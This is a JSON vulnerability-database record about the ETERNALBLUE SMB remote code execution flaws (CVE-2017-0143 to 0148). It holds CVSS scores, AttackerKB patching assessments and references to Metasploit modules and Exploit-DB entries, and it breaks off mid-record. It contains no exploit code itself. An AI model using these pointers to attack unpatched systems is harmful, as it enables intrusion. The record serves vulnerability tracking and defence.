{"type": "seebug", "lastseen": "2017-11-19T12:00:03", "href": "https://www.seebug.org/vuldb/ssvid-92952", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "modified": "2017-04-15T00:00:00", "reporter": "Root", "description": "From the shadowbroker, Windows XP to Windows 2012 SMB remote code execution vulnerability, corresponding to the number ETERNALBLUE it.\n\n * [CVE-2017-0143](<http://cvedetails.com/cve/cve-2017-0143>)\n * [CVE-2017-0144](<http://cvedetails.com/cve/cve-2017-0144>)\n * [CVE-2017-0145](<http://cvedetails.com/cve/cve-2017-0145>)\n * [CVE-2017-0146](<http://cvedetails.com/cve/cve-2017-0146>)\n * [CVE-2017-0147](<http://cvedetails.com/cve/cve-2017-0147>)\n * [CVE-2017-0148](<http://cvedetails.com/cve/cve-2017-0148>)\n\nReference: https://github.com/misterch0c/shadowbroker/blob/master/windows/specials/\n", "bulletinFamily": "exploit", "references": [], "viewCount": 436, "status": "poc,details", "sourceHref": "", "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "enchantments_done": [], "title": "ETERNALBLUE - Remote RCE via SMB & NBT (Windows XP to Windows 2012)", "id": "SSV:92952", "sourceData": "", "published": "2017-04-15T00:00:00", "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-11-19T12:00:03", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "seebug", "idList": ["SSV:92964"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-11-19T12:00:03", "rev": 2}, "vulnersScore": 7.7}, "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"attackerkb": [{"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "0e9cc0596e7cc45cd53e3953f7e7394d", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-03T16:41:41", "history": [{"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "448cf2599fc5c7df65505aa1bdf93d9d", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-11-15T18:38:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2020-11-15T18:38:31", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-11-15T18:38:31", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "attackerkb": {}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2020-11-15T18:38:31", "differentElements": ["attackerkb", "wildExploited"], "edition": 1}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "d3023dfbb1d1947a4b3462f81cadb1ae", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-11-18T06:39:05", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2020-11-18T06:39:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-11-18T06:39:05", "rev": 2, 